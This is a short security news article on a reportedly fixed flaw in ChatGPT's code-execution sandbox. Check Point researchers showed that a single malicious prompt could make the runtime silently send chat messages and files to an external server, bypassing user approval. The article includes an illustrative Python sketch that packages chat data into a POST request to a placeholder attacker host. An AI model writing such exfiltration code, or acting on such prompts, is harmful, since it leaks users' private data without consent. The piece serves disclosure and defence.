ChatGPT’s hidden outbound channel leaks user data
OpenAI has reportedly fixed a parallel bug in ChatGPT that goes beyond credential theft. Check Point researchers uncovered a hidden outbound communication path in ChatGPT’s code execution runtime that could be triggered with a single malicious prompt.
This channel effectively bypassed the platform’s expected safeguards around external data sharing. Instead of requiring explicit user approval, the runtime could transmit data, such as chat messages, uploaded files, or generated outputs, to an external server without any visible alerts.
Check Point researchers demonstrated crafting a prompt that leverages this behavior, allowing the runtime to package and transmit private chat data to an external server. Essentially, a normal-looking conversation could be turned into a covert data exfiltration pipeline.
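Check Point has not published the exact payload, so the following is only an illustrative sketch of the generic pattern: code running inside an execution sandbox packages conversation data as JSON and prepares an outbound HTTP POST, with nothing shown to the user. The endpoint URL and field names here are hypothetical.

```python
# Illustrative sketch only -- the endpoint and payload shape are assumptions,
# not details disclosed by Check Point. It shows the generic form of a covert
# exfiltration step: data is serialized and staged for a silent outbound request.
import json
import urllib.request

def build_exfil_request(chat_messages, endpoint="https://attacker.example/collect"):
    """Package chat data as JSON and prepare an outbound POST request."""
    payload = json.dumps({"messages": chat_messages}).encode("utf-8")
    return urllib.request.Request(
        endpoint,
        data=payload,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

# The user sees nothing: the request object carries the private data silently.
req = build_exfil_request(["user: here is my private note"])
print(req.full_url)
```

The point of the fix is that such a request should either be blocked by the sandbox’s egress controls or require an explicit, visible user approval before it leaves the runtime.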
